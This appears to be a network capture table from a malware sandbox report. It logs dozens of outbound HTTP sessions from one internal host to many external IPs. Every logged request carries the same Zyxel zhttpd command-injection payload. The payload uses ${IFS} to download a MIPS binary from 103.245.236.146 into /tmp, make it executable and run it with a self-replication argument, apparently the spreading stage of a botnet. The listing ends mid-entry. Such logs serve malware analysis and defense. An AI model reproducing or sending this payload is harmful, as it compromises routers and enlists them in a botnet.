                                      Jan 19, 2024 17:29:16.424449921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      531192.168.2.14419445.22.248.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424462080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      532192.168.2.143711887.244.54.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424521923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      533192.168.2.1433966107.88.138.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424551964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      534192.168.2.1453090106.150.69.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424613953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      535192.168.2.1437786150.138.182.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424628019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      536192.168.2.1442818128.206.0.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424659967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      537192.168.2.146054257.89.40.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424715996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      538192.168.2.143849491.62.63.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424726009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      539192.168.2.1455386219.98.103.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424771070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      540192.168.2.1437152135.140.236.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.425000906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      541192.168.2.14486404.247.254.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.457717896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      542192.168.2.144965078.34.133.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.457745075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      543192.168.2.1434828199.144.43.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.457801104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      544192.168.2.1454876132.101.105.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.457830906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      545192.168.2.145777464.49.154.196443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.457865953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      546192.168.2.146078841.15.16.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.457926989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      547192.168.2.1455178153.210.93.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.457948923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      548192.168.2.1452322192.143.100.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458004951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      549192.168.2.145358678.82.85.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458026886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      550192.168.2.1454308124.55.215.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458070040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      551192.168.2.1439740144.23.83.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458103895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      552192.168.2.1438792149.27.109.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458142042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      553192.168.2.145424023.210.92.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458167076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      554192.168.2.144006049.166.115.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458206892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      555192.168.2.1449606223.241.234.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458250999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      556192.168.2.1435210126.121.253.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458285093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      557192.168.2.1444046206.186.205.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458309889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      558192.168.2.1433460143.8.202.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458350897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      559192.168.2.145641862.28.252.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458385944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      560192.168.2.1450804114.182.97.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458429098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      561192.168.2.145971075.218.98.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458476067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      562192.168.2.1437900141.253.57.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458537102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      563192.168.2.145465864.146.65.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458566904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      564192.168.2.1450298196.83.164.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458616018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      565192.168.2.1443598207.57.244.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458653927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      566192.168.2.1447842198.215.19.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458690882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      567192.168.2.146088090.98.134.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458729982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      568192.168.2.143760688.113.241.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458775043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      569192.168.2.1438084182.41.30.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458802938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      570192.168.2.143281086.183.211.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458861113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      571192.168.2.144185881.148.237.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458873987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      572192.168.2.143459251.112.233.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458919048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      573192.168.2.144802283.195.144.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458969116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      574192.168.2.1452850130.117.228.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.458988905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      575192.168.2.14352669.101.39.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459028006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      576192.168.2.145894259.243.37.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459053993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      577192.168.2.1449744220.24.110.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459105015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      578192.168.2.144192870.127.92.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459129095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      579192.168.2.1446838197.253.83.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459170103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      580192.168.2.1457306113.127.48.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459217072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      581192.168.2.1446766176.1.195.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459244967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      582192.168.2.145689090.121.124.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459266901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      583192.168.2.1438678205.85.140.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459312916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      584192.168.2.145644480.27.129.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459377050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      585192.168.2.143309464.217.229.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459424019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      586192.168.2.1439166195.120.18.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459466934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      587192.168.2.1458822153.227.128.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459494114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      588192.168.2.145256495.234.240.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459551096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      589192.168.2.1439564220.164.93.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459569931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      590192.168.2.1440844147.195.91.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459606886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      591192.168.2.143286269.91.57.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459640980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      592192.168.2.145256040.77.138.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459681988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      593192.168.2.143449891.136.26.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:17.459712029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      594192.168.2.1451192211.59.254.241443
                                      TimestampBytes transferredDirectionData
